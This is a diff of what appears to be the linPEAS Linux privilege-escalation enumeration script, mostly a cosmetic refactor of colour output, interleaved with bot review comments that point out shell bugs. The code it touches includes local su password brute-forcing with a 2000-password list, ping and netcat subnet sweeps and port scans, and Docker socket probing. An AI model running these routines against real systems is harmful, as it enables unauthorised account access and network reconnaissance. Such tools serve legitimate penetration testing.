 printf $DG"No\n"$NC
 }
+print_title(){
+ if [ "$VERBOSE" ]; then
+ END_T2_TIME=`date +%s 2>/dev/null`
+ if [ "$START_T2_TIME" ]; then
+ TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME))
+ printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC
+ fi
+
+ END_T1_TIME=`date +%s 2>/dev/null`
+ if [ "$START_T1_TIME" ]; then
+ TOTAL_T1_TIME=$(($END_T1_TIME - $START_T1_TIME))
+ printf $DG"The total section execution took $TOTAL_T1_TIME seconds\n"$NC
+ echo ""
+ fi
+
+ START_T1_TIME=`date +%s 2>/dev/null`
+ fi
+
+ printf ${BLUE}"════════════════════════════════════╣ "$GREEN"$1"${BLUE}" ╠════════════════════════════════════\n"$NC
+}
+
+print_2title(){
+ if [ "$VERBOSE" ]; then
+ END_T2_TIME=`date +%s 2>/dev/null`
+ if [ "$START_T2_TIME" ]; then
+ TOTAL_T2_TIME=$(($END_T2_TIME - $START_T2_TIME))
+ printf $DG"This check took $TOTAL_T2_TIME seconds\n"$NC
+ echo ""
+ fi
+
+ START_T2_TIME=`date +%s 2>/dev/null`
+ fi
+
+ printf ${BLUE}"╔══════════╣ "$GREEN"$1\n"$NC #There are 10 "═"
+}
+
+print_3title(){
+ printf ${BLUE}"══╣ "$GREEN"$1\n"$NC #There are 2 "═"
+}
+
+print_list(){
+ printf ${BLUE}"═╣ "$GREEN"$1"$NC #There is 1 "═"
+}
+
+print_info(){
+ printf "${BLUE}╚ ${ITALIC_BLUE}$1\n"$NC
+}
+
 print_ps (){
- (ls -d /proc/*/ 2>/dev/null | while read f; do
+ (ls -d /proc/*/ 2>/dev/null | while read f; do
 CMDLINE=`cat $f/cmdline 2>/dev/null | grep -av "seds,"`; #Delete my own sed processess
- if [ "$CMDLINE" ];
- then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`;
- printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE";
- fi;
+ if [ "$CMDLINE" ];
+ then USER2=ls -ld $f | awk '{print $3}'; PID=`echo $f | cut -d "/" -f3`;
+ printf " %-13s %-8s %s\n" "$USER2" "$PID" "$CMDLINE";
+ fi;
 done) 2>/dev/null | sort -r
 }
 su_try_pwd (){
BFUSER=$1 PASSWORDTRY=$2 - trysu=`echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null` + trysu=`echo "$PASSWORDTRY" | timeout 1 su $BFUSER -c whoami 2>/dev/null` if [ "$trysu" ]; then - echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${C}[1;31;103m&${C}[0m," + echo " You can login as $BFUSER using password: $PASSWORDTRY" | sed -${E} "s,.*,${SED_RED_YELLOW}," fi } @@ -536,7 +624,7 @@ su_brute_user_num (){ if [ "$PASSWORD" ]; then su_try_pwd $BFUSER $PASSWORD & #Try given password fi - for i in `seq $TRIES`; do + for i in `seq $TRIES`; do su_try_pwd $BFUSER `echo $top2000pwds | cut -d " " -f $i` & #Try TOP TRIES of passwords (by default 2000) sleep 0.007 # To not overload the system done @@ -547,7 +635,7 @@ check_if_su_brute(){ error=$(echo "" | timeout 1 su `whoami` -c whoami 2>&1); if [ ! "`echo $error | grep "must be run from a terminal"`" ]; then echo "1" - fi + fi } eval_bckgrd(){ @@ -581,7 +669,7 @@ check_dns(){ # Adapted from https://github.com/carlospolop/bashReconScan/blob/master/brs.sh basic_net_info(){ - printf $B"═══════════════════════════╣ "$GREEN"Basic Network Info"$B" ╠═════════════════════════════\n"$NC + print_title "Basic Network Info" (ifconfig || ip a) 2>/dev/null echo "" } 
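Review bot: `warn_exec(){ $* || echo_not_found $1 }` expands `$*` unquoted, so any argument containing whitespace or a glob character is re-split and glob-expanded before the command runs; `"$@" || echo_not_found "$1"` runs the command with its arguments intact. In print_ps, the re-indented `then USER2=ls -ld $f | awk '{print $3}'` still parses as the assignment prefix `USER2=ls` on a command named `-ld`, so `USER2` is never set in the shell and the user column of the listing prints empty while the failure is hidden by the loop's `2>/dev/null`; `USER2=$(ls -ld "$f" | awk '{print $3}')` is presumably what was intended. The hunk's su_try_pwd function closes on this line.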
@@ -592,19 +680,19 @@ select_nc (){ $($FOUND_NC 127.0.0.1 65321 > /dev/null 2>&1) if [ $? -eq 2 ] then - NC_SCAN="timeout 1 $FOUND_NC -v -n" + NC_SCAN="timeout 1 $FOUND_NC -v -n" fi } icmp_recon (){ #Discover hosts inside a /24 subnetwork using ping (start pingging broadcast addresses) IP3=$(echo $1 | cut -d "." -f 1,2,3) - - (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & - (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + + (timeout 1 ping -b -c 1 "$IP3.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & + (timeout 1 ping -b -c 1 "255.255.255.255" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & for j in $(seq 0 254) do - (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${C}[1;31m&${C}[0m,") & + (timeout 1 ping -b -c 1 "$IP3.$j" 2>/dev/null | grep "icmp_seq" | sed -${E} "s,[0-9]+\.[0-9]+\.[0-9]+\.[0-9]+,${SED_RED},") & done wait } @@ -613,13 +701,13 @@ tcp_recon (){ #Discover hosts inside a /24 subnetwork using tcp connection to most used ports and selected ones IP3=$(echo $1 | cut -d "." -f 1,2,3) PORTS=$2 - printf $Y"[+]$B Ports going to be scanned: $PORTS" $NC | tr '\n' " " + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf "$NC\n" for port in $PORTS; do for j in $(seq 1 254) - do - ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + do + ($NC_SCAN $IP3.$j $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & done wait done 
@@ -629,22 +717,22 @@ tcp_port_scan (){ #Scan open ports of a host. Default: nmap top 1000, but the user can select others basic_net_info - printf $B"═══════════════════════════════════╣ "$GREEN"Network Port Scanning"$B" ╠═══════════════════════════════════\n"$NC + print_title "Network Port Scanning" IP=$1 PORTS="$2" PORTS="`echo \"$PORTS\" | tr ',' ' '`" if [ -z "$PORTS" ]; then - printf $Y"[+]$B Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: DEFAULT (nmap top 1000)" $NC | tr '\n' " " printf "$NC\n" PORTS="1 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 
1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 
8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389 3 4 6 7 9 13 17 19 20 21 22 23 24 25 26 30 32 33 37 42 43 49 53 70 79 80 81 82 83 84 85 88 89 90 99 100 106 109 110 111 113 119 125 135 139 143 144 146 161 163 179 199 211 212 222 254 255 256 259 264 280 301 306 311 340 366 389 406 407 416 417 425 427 443 444 445 458 464 465 481 497 500 512 513 514 515 524 541 543 544 545 548 554 555 563 587 593 616 617 625 631 636 646 648 666 667 668 683 687 691 700 705 
711 714 720 722 726 749 765 777 783 787 800 801 808 843 873 880 888 898 900 901 902 903 911 912 981 987 990 992 993 995 999 1000 1001 1002 1007 1009 1010 1011 1021 1022 1023 1024 1025 1026 1027 1028 1029 1030 1031 1032 1033 1034 1035 1036 1037 1038 1039 1040 1041 1042 1043 1044 1045 1046 1047 1048 1049 1050 1051 1052 1053 1054 1055 1056 1057 1058 1059 1060 1061 1062 1063 1064 1065 1066 1067 1068 1069 1070 1071 1072 1073 1074 1075 1076 1077 1078 1079 1080 1081 1082 1083 1084 1085 1086 1087 1088 1089 1090 1091 1092 1093 1094 1095 1096 1097 1098 1099 1100 1102 1104 1105 1106 1107 1108 1110 1111 1112 1113 1114 1117 1119 1121 1122 1123 1124 1126 1130 1131 1132 1137 1138 1141 1145 1147 1148 1149 1151 1152 1154 1163 1164 1165 1166 1169 1174 1175 1183 1185 1186 1187 1192 1198 1199 1201 1213 1216 1217 1218 1233 1234 1236 1244 1247 1248 1259 1271 1272 1277 1287 1296 1300 1301 1309 1310 1311 1322 1328 1334 1352 1417 1433 1434 1443 1455 1461 1494 1500 1501 1503 1521 1524 1533 1556 1580 1583 1594 1600 1641 1658 1666 1687 1688 1700 1717 1718 1719 1720 1721 1723 1755 1761 1782 1783 1801 1805 1812 1839 1840 1862 1863 1864 1875 1900 1914 1935 1947 1971 1972 1974 1984 1998 1999 2000 2001 2002 2003 2004 2005 2006 2007 2008 2009 2010 2013 2020 2021 2022 2030 2033 2034 2035 2038 2040 2041 2042 2043 2045 2046 2047 2048 2049 2065 2068 2099 2100 2103 2105 2106 2107 2111 2119 2121 2126 2135 2144 2160 2161 2170 2179 2190 2191 2196 2200 2222 2251 2260 2288 2301 2323 2366 2381 2382 2383 2393 2394 2399 2401 2492 2500 2522 2525 2557 2601 2602 2604 2605 2607 2608 2638 2701 2702 2710 2717 2718 2725 2800 2809 2811 2869 2875 2909 2910 2920 2967 2968 2998 3000 3001 3003 3005 3006 3007 3011 3013 3017 3030 3031 3052 3071 3077 3128 3168 3211 3221 3260 3261 3268 3269 3283 3300 3301 3306 3322 3323 3324 3325 3333 3351 3367 3369 3370 3371 3372 3389 3390 3404 3476 3493 3517 3527 3546 3551 3580 3659 3689 3690 3703 3737 3766 3784 3800 3801 3809 3814 3826 3827 3828 3851 3869 3871 3878 3880 3889 3905 3914 3918 
3920 3945 3971 3986 3995 3998 4000 4001 4002 4003 4004 4005 4006 4045 4111 4125 4126 4129 4224 4242 4279 4321 4343 4443 4444 4445 4446 4449 4550 4567 4662 4848 4899 4900 4998 5000 5001 5002 5003 5004 5009 5030 5033 5050 5051 5054 5060 5061 5080 5087 5100 5101 5102 5120 5190 5200 5214 5221 5222 5225 5226 5269 5280 5298 5357 5405 5414 5431 5432 5440 5500 5510 5544 5550 5555 5560 5566 5631 5633 5666 5678 5679 5718 5730 5800 5801 5802 5810 5811 5815 5822 5825 5850 5859 5862 5877 5900 5901 5902 5903 5904 5906 5907 5910 5911 5915 5922 5925 5950 5952 5959 5960 5961 5962 5963 5987 5988 5989 5998 5999 6000 6001 6002 6003 6004 6005 6006 6007 6009 6025 6059 6100 6101 6106 6112 6123 6129 6156 6346 6389 6502 6510 6543 6547 6565 6566 6567 6580 6646 6666 6667 6668 6669 6689 6692 6699 6779 6788 6789 6792 6839 6881 6901 6969 7000 7001 7002 7004 7007 7019 7025 7070 7100 7103 7106 7200 7201 7402 7435 7443 7496 7512 7625 7627 7676 7741 7777 7778 7800 7911 7920 7921 7937 7938 7999 8000 8001 8002 8007 8008 8009 8010 8011 8021 8022 8031 8042 8045 8080 8081 8082 8083 8084 8085 8086 8087 8088 8089 8090 8093 8099 8100 8180 8181 8192 8193 8194 8200 8222 8254 8290 8291 8292 8300 8333 8383 8400 8402 8443 8500 8600 8649 8651 8652 8654 8701 8800 8873 8888 8899 8994 9000 9001 9002 9003 9009 9010 9011 9040 9050 9071 9080 9081 9090 9091 9099 9100 9101 9102 9103 9110 9111 9200 9207 9220 9290 9415 9418 9485 9500 9502 9503 9535 9575 9593 9594 9595 9618 9666 9876 9877 9878 9898 9900 9917 9929 9943 9944 9968 9998 9999 10000 10001 10002 10003 10004 10009 10010 10012 10024 10025 10082 10180 10215 10243 10566 10616 10617 10621 10626 10628 10629 10778 11110 11111 11967 12000 12174 12265 12345 13456 13722 13782 13783 14000 14238 14441 14442 15000 15002 15003 15004 15660 15742 16000 16001 16012 16016 16018 16080 16113 16992 16993 17877 17988 18040 18101 18988 19101 19283 19315 19350 19780 19801 19842 20000 20005 20031 20221 20222 20828 21571 22939 23502 24444 24800 25734 25735 26214 27000 27352 27353 27355 
27356 27715 28201 30000 30718 30951 31038 31337 32768 32769 32770 32771 32772 32773 32774 32775 32776 32777 32778 32779 32780 32781 32782 32783 32784 32785 33354 33899 34571 34572 34573 35500 38292 40193 40911 41511 42510 44176 44442 44443 44501 45100 48080 49152 49153 49154 49155 49156 49157 49158 49159 49160 49161 49163 49165 49167 49175 49176 49400 49999 50000 50001 50002 50003 50006 50300 50389 50500 50636 50800 51103 51493 52673 52822 52848 52869 54045 54328 55055 55056 55555 55600 56737 56738 57294 57797 58080 60020 60443 61532 61900 62078 63331 64623 64680 65000 65129 65389" else - printf $Y"[+]$B Ports going to be scanned: $PORTS" $NC | tr '\n' " " + printf ${YELLOW}"[+]${BLUE} Ports going to be scanned: $PORTS" $NC | tr '\n' " " printf "$NC\n" fi for port in $PORTS; do - ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${C}[1;31m&${C}[0m,g") & + ($NC_SCAN $IP $port 2>&1 | grep -iv "Connection refused\|No route\|Version\|bytes\| out" | sed -${E} "s,[0-9\.],${SED_RED},g") & done wait } 
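Review bot: The default `PORTS` literal assigned under `if [ -z "$PORTS" ]` appears to contain the nmap top-1000 list twice (the sequence restarts with `3 4 6 7 9 13 …` immediately after `65389`); if that duplication is really in the file and not an artifact of how this page was rendered, every port is probed twice and the scan takes twice as long for no gain. Either trim the literal or normalise it the way discovery_port_scan already does for user-supplied ports, e.g. `PORTS=\`echo "$PORTS" | tr " " "\n" | sort -un | tr "\n" " "\`` right after the `if`/`else`. The function header `tcp_port_scan (){` is only the hunk's context marker, so the function starts just outside the hunk.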
@@ -653,32 +741,32 @@ discover_network (){ #Check if IP and Netmask are correct and the use fping or ping to find hosts basic_net_info - printf $B"════════════════════════════════════╣ "$GREEN"Network Discovery"$B" ╠════════════════════════════════════\n"$NC + print_title "Network Discovery" DISCOVERY=$1 IP=$(echo $DISCOVERY | cut -d "/" -f 1) NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) - + if [ -z $IP ] || [ -z $NETMASK ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24"$NC; - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 fi #Using fping if possible - if [ "$FPING" ]; then - $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${C}[1;31m&${C}[0m," - + if [ "$FPING" ]; then + $FPING -a -q -g $DISCOVERY | sed -${E} "s,.*,${SED_RED}," + #Loop using ping else if [ $NETMASK -eq "24" ]; then - printf $Y"[+]$GREEN Netmask /24 detected, starting...\n$NC" + printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n$NC" icmp_recon $IP - + elif [ $NETMASK -eq "16" ]; then - printf $Y"[+]$GREEN Netmask /16 detected, starting...\n$NC" + printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n$NC" for i in $(seq 1 254) - do + do NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 icmp_recon $NEWIP done 
@@ -693,20 +781,20 @@ discovery_port_scan (){ basic_net_info #Check if IP and Netmask are correct and the use nc to find hosts. By default check ports: 22 80 443 445 3389 - printf $B"═══════════════════════════╣ "$GREEN"Network Discovery (scanning ports)"$B" ╠═════════════════════════════\n"$NC + print_title "Network Discovery (scanning ports)" DISCOVERY=$1 MYPORTS=$2 IP=$(echo $DISCOVERY | cut -d "/" -f 1) NETMASK=$(echo $DISCOVERY | cut -d "/" -f 2) echo "Scanning: $DISCOVERY" - + if [ -z "$IP" ] || [ -z "$NETMASK" ] || [ "$IP" = "$NETMASK" ]; then printf $RED"[-] Err: Bad format. Example: 127.0.0.1/24\n"$NC; if [ "$IP" = "$NETMASK" ]; then - printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: $Y-i [-p ]\n\n"$NC; + printf $RED"[*] This options is used to find active hosts by scanning ports. If you want to perform a port scan of a host use the options: ${YELLOW}-i [-p ]\n\n"$NC; fi - printf $B"$HELP"$NC; + printf ${BLUE}"$HELP"$NC; exit 0 fi @@ -714,13 +802,13 @@ discovery_port_scan (){ PORTS=`echo "$PORTS" | tr " " "\n" | sort -u` #Delete repetitions if [ "$NETMASK" -eq "24" ]; then - printf $Y"[+]$GREEN Netmask /24 detected, starting...\n" $NC + printf ${YELLOW}"[+]$GREEN Netmask /24 detected, starting...\n" $NC tcp_recon $IP "$PORTS" - + elif [ "$NETMASK" -eq "16" ]; then - printf $Y"[+]$GREEN Netmask /16 detected, starting...\n" $NC + printf ${YELLOW}"[+]$GREEN Netmask /16 detected, starting...\n" $NC for i in $(seq 0 255) - do + do NEWIP=$(echo $IP | cut -d "." -f 1,2).$i.1 tcp_recon $NEWIP "$PORTS" done @@ -756,7 +844,7 @@ containerCheck() { grep "/docker/" /proc/1/cgroup -qa 2>/dev/null || grep -qai docker /proc/self/cgroup 2>/dev/null || [ "`find / -maxdepth 3 -name \"*dockerenv*\" -exec ls -la {} \; 2>/dev/null`" ] ; then - + inContainer="1" containerType="docker" fi 
@@ -772,12 +860,28 @@ containerCheck() {
 fi
 
 # Are we inside LXC?
- if env | grep "container=lxc" -qa 2>/dev/null ||
+ if env | grep "container=lxc" -qa 2>/dev/null ||
 grep "/lxc/" /proc/1/cgroup -qa 2>/dev/null; then
-
+
 inContainer="1"
 containerType="lxc"
 fi
+
+ # Are we inside podman?
+ if env | grep -qa "container=podman" 2>/dev/null ||
+ grep -qa "container=podman" /proc/1/environ 2>/dev/null; then
+
+ inContainer="1"
+ containerType="podman"
+ fi
+
+ # Check for other container platforms that report themselves in PID 1 env
+ if [ -z "$inContainer" ]; then
+ if grep -a 'container=' /proc/1/environ 2>/dev/null; then
+ inContainer="1"
+ containerType="`grep -a 'container=' /proc/1/environ | cut -d= -f2`"
+ fi
+ fi
 }
 
 inDockerGroup() {
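Review bot: The generic fallback `if grep -a 'container=' /proc/1/environ 2>/dev/null; then` runs grep without `-q`, so on a match it prints PID 1's whole environment into the report as one NUL-joined line, and the `cut -d= -f2` on the next assignment is applied to that same blob rather than to the `container=` entry alone, so `containerType` can pick up text belonging to a neighbouring variable. Splitting on NUL first keeps both honest: `if tr '\0' '\n' < /proc/1/environ 2>/dev/null | grep -q '^container='; then` and `containerType="\`tr '\0' '\n' < /proc/1/environ 2>/dev/null | grep '^container=' | cut -d= -f2\`"`. Note also that /proc/1/environ is normally readable only by a user with ptrace access to PID 1, so for an unprivileged run both the podman probe and this fallback will usually fail silently; a comment such as `# /proc/1/environ is usually unreadable for non-root; the env-based checks above are the best effort then` would save the next reader a puzzle. The containerCheck body starts before this hunk.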
@@ -799,26 +903,26 @@ enumerateDockerSockets() {
 if ! [ "$SEARCHED_DOCKER_SOCKETS" ]; then
 SEARCHED_DOCKER_SOCKETS="1"
 for dock_sock in `find / ! -path "/sys/*" -type s -name "docker.sock" -o -name "docker.socket" 2>/dev/null`; do
- if [ -w "$dock_sock" ]; then
- echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${C}[1;31;103m&${C}[0m,g"
+ if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]; then
+ echo "You have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_RED_YELLOW},g"
 echo "Docker enummeration:"
 docker_enumerated=""
-
+
 if [ "$(command -v curl)" ]; then
 sockInfoResponse="`curl -s --unix-socket \"$dockerSockPath\" http://localhost/info`"
 dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'ServerVersion' | cut -d'"' -f 4)
 echo $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
 if [ "$sockInfoResponse" ]; then docker_enumerated="1"; fi
 fi
-
+
 if [ "$(command -v docker)" ] and ![ "$docker_enumerated" ]; then
 sockInfoResponse="`docker info`"
 dockerVersion=$(echo "$sockInfoResponse" | tr ',' '\n' | grep 'Server Version' | cut -d' ' -f 4)
 printf $sockInfoResponse | tr ',' '\n' | grep -E "$GREP_DOCKER_SOCK_INFOS" | grep -v "$GREP_DOCKER_SOCK_INFOS_IGNORE" | tr -d '"'
 fi
-
+
 else
- echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${C}[1;32m&${C}[0m,g"
+ echo "You don't have write permissions over Docker socket $dock_sock" | sed -${E} "s,$dock_sock,${SED_GREEN},g"
 fi
 done
 fi
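Review bot: Inside the new `if ! [ "$IAMROOT" ] && [ -w "$dock_sock" ]` branch the curl probe still reads `--unix-socket \"$dockerSockPath\"` while the loop variable is `$dock_sock`; unless `dockerSockPath` is assigned somewhere outside this hunk, curl is handed an empty socket path, `sockInfoResponse` stays empty and `docker_enumerated` is never set. The fallback `if [ "$(command -v docker)" ] and ![ "$docker_enumerated" ]; then` is not valid shell (`and` is not an operator and `![` is not `! [`), so the docker-CLI path cannot run cleanly either; it should read `if [ "$(command -v docker)" ] && ! [ "$docker_enumerated" ]; then`. Finally, the root guard routes a root user into the `else` branch, which prints "You don't have write permissions over Docker socket" even though root does have them; a neutral message or an explicit skip for root would be less misleading. enumerateDockerSockets starts before this hunk.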
@@ -857,29 +961,29 @@ checkContainerExploits() { #-----------) Some Basic Info (-----------# ########################################### -printf $B"════════════════════════════════════╣ "$GREEN"Basic information"$B" ╠════════════════════════════════════\n"$NC +print_title "Basic information" printf $LG"OS: "$NC -(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_5,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_6,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Trusty_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Ubuntu_Xenial,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel5_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_1,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_2,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_3,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel6_4,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelDCW_Rhel7,${C}[1;31;103m&${C}[0m," | sed -${E} "s,$kernelB,${C}[1;31m&${C}[0m," +(cat /proc/version || uname -a ) 2>/dev/null | sed -${E} "s,$kernelDCW_Ubuntu_Precise_1,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_2,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_3,${SED_RED_YELLOW}," | sed -${E} "s,$kernelDCW_Ubuntu_Precise_4,${SED_RED_YELLOW}," | sed -${E} 